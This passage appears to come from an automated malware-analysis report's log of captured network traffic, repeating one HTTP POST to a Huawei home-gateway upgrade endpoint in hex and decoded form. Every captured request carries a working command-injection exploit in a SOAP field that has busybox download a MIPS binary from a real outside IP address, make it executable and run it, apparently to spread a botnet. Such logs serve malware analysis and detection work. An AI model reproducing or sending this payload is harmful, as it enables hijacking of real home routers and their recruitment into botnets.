6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 